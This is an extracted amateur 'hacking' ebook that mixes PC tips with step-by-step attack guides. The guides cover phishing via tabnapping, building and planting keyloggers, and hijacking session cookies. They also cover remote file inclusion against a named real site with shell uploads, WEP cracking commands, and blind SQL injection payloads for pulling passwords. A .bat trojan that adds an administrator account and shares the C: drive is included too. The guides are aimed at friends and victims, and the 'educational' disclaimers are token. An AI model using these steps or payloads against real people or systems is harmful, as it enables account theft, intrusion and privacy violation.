• No results found

Anurag Hacking With Experts pdf

N/A
N/A
Protected

Academic year: 2020

Share "Anurag Hacking With Experts pdf"

Copied!
128
0
0

Loading.... (view fulltext now)

Full text

(1)
(2)

By

Anurag

Legal Disclaimer

(3)

About The Author

Anurag is a 20 year old computer geek. Who likes to find vulnerabilities Doing

Hacking , Programming , editing , cracking , web designing and writing books

He Wants To Be An Software Designer..!!!!

Join His Blog:

Computer Expert

Greetz :

Hack The Universe Computer Expert

Introduction

What are Hackers

Hackers Hierarchy

Hacking Facebook Accounts using Tabnapping

Hacking FB Accounts using Keylogger

10 Security Enhancements

5 Reasons Why PC Crash

Delete An undeletable File

(4)

Make Your Pc Faster

Hacking Yahoo Messenger Multi Login

Yahoo Chat Commands

How To Hack Yahoo Webcam

COPY X BOX GAMES

Hacking FB , Twitter Accounts Using Wi-Fi

Hacking PC Using Pendrives

Protect Email Accounts from Spam

How to hack Site Using RFI

How to hack Wi-Fi

Post Status To FB By Any Device

(5)

Blind Sql Injection

How To Get Thousand of Twitter Followers Per Day

How To Post in all FB Group in a single click

How To Create a Trojan File in a .bat file

Make ur Videos look like Action Videos

How To hack Sites Using Havji

Mass Deface Tutorial

Hide Keyloggers in a .jpg file

Increase Internet Speed Upto 300% (Firefox Only)

“Encoadble” Shell Upload Vul.

Hack Administrator Password in Window XP

(6)

How To Change ur IP

Hacking Mobile Using Bluetooth

“Image Uploader” Shell Upload Vulnerability

World Trade Centre Attack In Notepad

Make a Personal Log Book In Notepad

Test Ur Antivirus Using Notepad

Continually Pop The CD Drive

Matrix Effect In Notepad

Change The Header/Footer Of Ur Notepad File

Shut Down PC After Convening Any Message Using Notepad

Type “You Are A Fool” Continuously In Notepad

(7)

Creating Your Own Search Engine

Fool Ur Friends With Your Intel® Core™ i11 Processor

Secret Codes For Android Phones

PHP (Dos/DDOS) Attack Script

Make Ur PC Talk Like Jarvis Operating System

Hack To Hack Wi-Fi Using Backtrack

How To Get 1000+ Likes In Facebook

How To Hack Remote PC Using Prorat

Free Download SMS Bomber For Android Phones

How To Know Ur PC Gender

Hacking OS For Mobile Phones

(8)

How To Hack IP Address Of a Remote PC

How To Send Anonymous Email

Gprs Trick For All Networks

5 Rarely known Google I’m Feeling Tricks

How To DDOS Manually

Creating A Board AKA Forum on our own PC

How To Set Wallpaper In Pen-Drive

How To Download YouTube Video

Make A Batch To Clean Ur PC, All In One..!!!

Create A FB Virus (Funny)

How To Get ur Windows Lost Password

(9)

Call Ur Friends By His Own Number

How To Make Ur Own Antivirus Using Notepad

How To Use Your Pen drive As Ram

How To Crack IDM Manually

Post Blank Status or Comment In Facebook

How To Hack Victim PC Using metasploit and Nmap

(10)

Chapter 1 – What are Hackers:

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to

explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do. There are two types of hackers:

White Hat – These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats. Black Hat– These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites.

(11)

Chapter 2 – Hackers Hierarchy:

Script kiddies – These are the wannabe hackers. They are looked down upon in the hacker

community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes.

Intermediate hackers – These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use predeveloped well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks

(12)

Chapter 3 – Hacking FB Accounts Using Tabnapping :

Note : Only For Educational Propose..!!!

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube,google etc and came back to your website then your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.

So lets see how to hack facebook account using tab napping trick.

Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website :

www.000webhost.com www.host1free.com www.my3gb.com

or you can search on google and create an account.

2) Now download the script and phishing pages from here: http://www.mediafire.com/?0zrp565h8v90jbe 3) Extract it and you will see the files and folders like below:

4) Upload all the files and folders to your website. when you upload it's look like

5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.

The website look like this:

(13)
(14)

Chapter 4 – Hacking FB Accounts Using Keylogger :

Note : Only

For Educational Propose..!!!

1. first u must have the emissary keylogger in ur system. and Net Framework installed bcoz keyloggers wont work without this.

2. then u have 2 create fake account at google. its use is this when u hack a person his data will be mailed to ur account.

3. ok when u do these 2 Now open the the Emissary Keylogger.

4. their you can see Gmail User Name. and below it Gmail Password. PUt the gamil account with password their . Bcoz this will confrm itslef that the mails have 2 sent for ths account or not..

5.when u put their u can see Test Mail.. just click on it . it will be blink for a minute and then a window will appear and saying "Message has sent. Check your mail." then check ur mail is their a msg recieved from the emissary. if not then try again bcoz u hv enterd the pass or id wrong.

6. After it below u can see Server Namme in the bracket will be written

"sever.exe" well u can change the name like Nav.exe..NOTe u can only change server but not .exe e.g.. NAv.exe.

7. Below that is Interval .. IT means that what u want in how much minutes the mail come to u from the victms pc. i like to give it 3 bcoz this is gud.

8. At the End u can see Build Server. just click on it and i file will apear at ur system by then name u have given in server name . and it will be at the same directory where the emissary keylogger is..

9. NOW the file is created with u.. Give that file to the victm who u want to hack If he OPens it then he will be hacked..

10. If u are worried how can i gave them . Then post it to the free web hosting space like

(15)

Chapter 5 –10 Security Enchaments:

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly

(_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them. 5. Use strong passwords and change them periodically. Passwords should have at least seven

characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at

w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

(16)

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

(17)

Chapter 6 – 5 Reasons Why PC Crash:

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1. Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device

communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function

properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

(18)

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3. BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A

common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer

becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4. Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

(19)

disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler. The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to * Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5. Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems. These can often be resolved easily by reducing the resolution of the video display. Go to * Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to * Start-Settings-Control Panel-System-Performance-Graphics

(20)
(21)

Chapter 6 – Delete An undeletable File:

Open a Command Prompt window and leave it open. Close all open programs.

Click Start, Run and enter TASKMGR.EXE

Go to the Processes tab and End Process on Explorer.exe. Leave Task Manager open.

Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.

At the command prompt type DEL <filename> where <filename> is the file you wish to delete.

Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.

Close Task Manager. Or you can try this Open Notepad.exe Click File>Save As..>

locate the folder where ur undeletable file is Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box put a " at the start and end of the filename

(the filename should have the extension of the undeletable file so it will overwrite it)

click save, It should ask u to overwrite the existing file, choose yes and u can delete it as normal Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start 2. Run

3. Type: command

4. To move into a directory type: cd c:\*** (The stars stand for your folder)

5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1

6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.

7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a

(22)

Chapter 7 – Converting Movies To Psp Format:

I just watched Africa the Serengeti on my PSP and heres is the lowdown. Movie - approx 40 minutes - dvd

Saved to hard drive - 2.6GIG - using DVD Decryptor (free program) try google

Transfered to avi format - 377MB- using Super DVD Ripper (9 FREE trial uses) then you must buy

Transfered to MP4 - 37MB - using the (basically free) Image convertor 2 Average movie breakdown - using above as a guide only.

so im guessing the average movie may be 4.5gig for example saved to 800MB

CONVERTED TO 70-80MB

Ok use DVD decryptor to save the movie to your hard drive eg. C:\africa (it will save it for you as described)

When completed find the folder c:\africa on your computer and find the vob file in that folder

-generally the largest one and right click and play it with your dvd program to see what part it is. If its the correct movie part you now know thats the one you need.

Once you have located the vob file you want to transfer open DVD Ripper and go to wizard icon. There you will see an icon of VOB to AVI button. Click it and then it will ask to locate the file.

Locate the file and click it. It will SCAN THE FILE(just wait till that finishes) a parameter box opens next and just click the arrow. It then askes to choose output file, click the file icon and locate the

correct fob file. It then askes for file compression - choose microsoft windows media and then click ok Then press the start button. It will now convert the vob into avi format.

(there are also other opions ie;dvd to avi etc) I have only used the vob to avi for this test.

After DVD ripper has transferred the file it will save it to the same folder as the original move was in eg: c:\africa\viteots. Open the file and you will now see an AVI icon containing the movie.

Make sure you PSP is on and in usb mode then Open Image convertor 2 and press on movie / add to list. For this example i click on C:drive the found the folder Africa and opened it and there was my converted AVI file. Click the file press ok and it will be transfered to your PSP for viewing pleasure.

(23)

Chapter 8 – Make Your Pc Faster, Guaranteed:

1. First, run a scandisk or checkdisk. Let Windows fix any errors. 2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.

3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.

4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!) 5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.

6. Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)

7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.

8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non-essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.

9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk

management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1x, instead of being used at 4x!

10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...

(24)

Chapter 9 –Hacking Yahoo Messenger For Multiple Account

Login:

a) Open Registry Editor (regedit.exe) Click Start > Run and then type 'regedit' press enter.

(25)

Chapter 10 –Yahoo Chat Commands:

/join [room] go to what ever room you wish /invite [buddys name] sends invitation request /tell [user] [message] private messages a friend /follow [user] follows a friend

/stopfollow [user] stop following someone

/stopfollow [yourname] to stop them from following you /goto [user] enters the room the user is in

/away [off] turn your private messages back on /think [message] (type this to think what you want /ignore [list] list everyone who you are ignoring

(26)

Chapter 11 –How To hack Yahoo Webcam:

Follow the below steps to do this 1) Open the following location C:\Program Files\Yahoo\Messenger 2) You will find the file ―res_msgr.dllǁ. Delete this file.

3) Download this cracked file from the below link

http://rapidshare.com/files/108328721/res_msgr.dll

(27)

Chapter 12 –Copy X-BOX Games:

1) Insert your original in your CD-ROM. 2) Open CDRWin (or any other image

extractor) to make an iso image of the game on your hard disc. Click on 'Extract

Disc/Tracks/Sectors' 3) Here are the settings which work for me (!): Disc

Image/Cue sheet File-Format: Automatic Reading-Options: RAW, CD+G,

CD-TEXT and MCN/USRC all Unchecked Error Recovery: Ignore Jitter

Correction: Auto Subcode Analyses: Fixed Data-Speed: MAX Read Retry

Count: 10 Audio Speed: MAX Subcode Threshold: 900 There are a lot of

reports, that Raw reading also works, but I had problems with it enabled. 4)

Click on 'Start'

---RECORDING TO A DISC

---1) Install Fireburner

(28)
(29)

Note : Only For Educational Propose.>!!!

1.first download firesheep from here http://codebutler.github.com/firesheep/ [install it in your firefox browser]

2. Once installed it will open a sidebar window into your firefox browser.

3.Now it will show all the people who are connected to unsecured wifi network.Once they login into your facebook or twitter account you will get a notification and with a single click you can login into their account.

This whole thing work on the technique of cookie hijacking.Once your session cookie is hacked then anybody can login into your

account.These cookies can be easily caputered on unsecured wifi network.

The best way to protect yourself from such a hacking trick is to avoid using your facebook or twitter accounts on unsecured wifi networks as it is a security lapse from the websites not on your side.

(30)
(31)

Note : Only For Educational Propose.>!!!

Download ToolKit From Here:

http://www.mediafire.com/download.php?5in0oo2uuf9tknn

Extract the software

open pcinfo folder

select all the files and paste it in your USB(pendrive)

it in the pc u wanna hack

Open the USB drive, give it 2 sec and and ur job is done...!!

And now open the dump folder in ur pc and u will have all the info u want Ok now the problem which i was facing

(32)

Chapter 15 –Protect Email From Spam:

The following methods can be used to combat email spam.

1. Use spam filters for your email account. If you‘re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each Spam filter has it‘s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chatrooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead signup for a dummy email account and use this for surveys and feedback forms.

(33)

Chapter 16 –How To Hack Sites Using RFI:

Note : Only For

Educational Purpose.>!!!

Lets Start

1st Find a Vunerable websites using Google Dork

“inurl:index.php?page=” its Most Popular Dork of RFI hacking

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

See example of this website http://www.cbspk.com So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.sh3ll.org/c99.zip

The hacker would first upload the shells to a webhosting site such as ripway.com,

viralhosts.com,110mb.com or another free hosts etc. Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now here is how a hacker would execute the following command to gain access

(34)
(35)

Chapter 17 –How To Hack Wi-Fi Network:

Note : Only For

Educational Purpose.>!!!

1) First we need to scan for available wireless networks.

Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac.

The two most common encryption types are: 1) WEP

2) WAP

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.

WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

WAP is currently the most secure and best option to secure a wi-fi network.. It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares for this very purpose.. The tools we will be using on Backtrack are:

Kismet – a wireless network detector

airodump – captures packets from a wireless router

aireplay – forges ARP requests aircrack – decrypts the WEP keys

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN

0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

(36)

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following

command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device] In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following

command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is: aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

(37)

Chapter 18 –Post Status To FB by Any Device :

Hello guys many of you are asking me about this trick how to update fb status via any device just like i5,blackberry,galaxy s3,lumia,Android etc.. and shock ur friend :D its damm* easy i m going to

provide u a website from where u can update ur status via any device any os just visit the link given below !!!!

plus points: from this site u can update ur status safely no facebook blockage will happen this site is spam,bug,virus free enjoy :)!! Link :

(38)

Chapter 19 –Convert Mozilla To Keylogger:

How this Keylogger Works?

Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

Detection against AV & Firewalls?

fully undectectable against Mcafee,Norton and Avast dont worry.

concept?

you can get many victims just visit a cyber_cafe and make firefox keylogger this is also a warning to those who use firefox in cafes :)>!! The keylogger will work on the basis of a script that disables the Firefox browser to ask the user to save his password whenever he logins to a website. Thereby, allowing the Firefox to store his username and password combination automatically without prompting the user. Just follow these steps to convert your firefox into a keylogger :

1. First and foremost, download the script from here

.

2. If you are a Windows user, then navigate to C:/Program Files/Mozilla Firefox/Components

and if you are using MAC, then navigate to Applications -> Right Click Firefox > Show Package Contents -> Contents/MacOS/Components

3. In the downloaded rar file, you will find a script named as nsLoginManagerPrompter.js, simply extract and then copy and paste the file in the folder that is applicable to you.

4. Your Firefox keylogger is now ready and whenever anyone enters his username and password on any site, (this tricks works in almost all sites like facebook,twitter,linked.in,gmail,myspace) his/her details would be saved automatically which can be easily retrieved using

(39)

Chapter 20 –Blind Sql Injection Tutorial:

Note : Only For

Educational Purpose.>!!!

Let's start with advanced stuff. I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some articles on that page, pictures etc... then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

Steps

1) Get the MySQL version

to get the version in blind attack we use substring i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5. i.e http://www.site.com/news.php? id=5 and substring(@@version,1,1)=5 2) Test if subselect works when select don't work then we use subselect i.e http://www.site.com/news.php?id=5 and (select 1)=1 if page loads normally then

subselects work. then we gonna see if we have access to mysql.user i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :) i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits. if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

(40)

substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1) 4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE) we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 we get TRUE, keep incrementing

(41)

Chapter 21 –How To Get 1000 of Twitter Followers:

#teamfollowback is A Group of twitter members on twitter, who want a lot of followers. You need to join their Group by adding #teamfollowback suffix or Prefix on while tweeting.

Login to your Twitter Account. Search For #teamfollowback

Follow the people who have added #teamfollowback #ifollowback #ifollowall in there tweets. Follow morre and more people who have added those tags in there tweets, You will get the same i.e more followers.

Some more hash tags to get Followers on Twitter. #teamfollowback

#ifollowall #ifollowback #1000_aday #TFB

(42)

Chapter 22 - How To Post In All FB Group In A Single Click:

1) visit this website http://www.hexcolor.in/tools/multipost/index.php

2) login with your facebook account

3) now follow all the requirement and you will see something like that

4) you will see all your fb group and a box fill your message and tick all group click on post

5) you have done it :)> !!!

(43)

Chapter 23 - How To Create A Trojan in a .bat file:

Note : Only

For Educational Purpose.>!!!

Bat file is a piece of text that windows will execute as commands. Open notepad and whrite there:

dir pause

And now save this as test.bat and execute it. Funny aint it ?

— Starting ——————--:Server:

The plan here is to share the C: drive and make a new user with administrators access

Step one -> Open a dos prompt and a notebook

The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add

What does this do? It makes a new user called neo you can put any name you whant

Command n 2-> net localgroup administrators neo /add

This is the command that make your user go to the administrators group.

Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators

and for the portuguese version is administradores so it’s nice yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited

This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.

-!extras!Command n 4-> net send urip I am ur server

Where it says urip you will insert your ip and when the victim

opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————- Now that your friend opened your .bat file her system have the

C: drive shared and a new administrator user.

First we need to make a session with the remote computer with the net use command , you will execute these commands from your

dos prompt.

Command n 1 -> net use \\victimip neo This command will make a session between you and the victim

(44)

\\victimip\system

(45)

Chapter 24 – make Ur Videos look Like Action Movie:

Convert Ur Ordinary Videos To Action Movie By Using Ultimate FX Studio....=D

With Ultimate Special Fx you can turn your ordinary video recorded from your phone camera into a stunning, action movie clips. Developed by TechCat Mobiles developers, Ultimate Special FX provides the users to add various visual effects to the video is been recorded through your phone camera. Users can add missile pods, air destruction, flying cars, dinosaurs invasion rolling on to your camera screen.

To begin with, tap the Start button on the app’s homescreen.

Select one of the three available scenes (it seems more effects will be added soon), and tap Action!to launch the recording screen. Tap the red button at the bottom to begin recording.

As per the app’s instructions, try to record a video clip of at least 5 seconds. While recording, keep your hands as steady as possible, with the cross hair in the viewfinder kept on the object that you wish to apply the effect on.

Tappi ng the red button once again will stop the recording, and you’ll be taken to another screen from where you can specify the exact point in the video where you want the effect to appear by dragging the slider at the to select the preferred position within the clip. Once done, tap OK, wait for the app to go through the rendering process, and voila! You now have your very own Hollywood-grade action sequence

Download From Here

(46)

Chapter 25 –How To Hack Sites Using Havji:

Note : Only For

Educational Purpose.>!!!

Just Follow these easy steps : 1. First download havij from here http://itsecteam.com/

2. Run Havij SQL Injection software and copy and paste vulnerable website link 3. Now click in the “Analyze” Button

